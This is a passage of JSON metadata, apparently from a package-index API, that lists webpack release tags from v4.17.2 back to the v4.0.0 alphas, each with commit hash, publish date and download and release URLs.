ttps://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05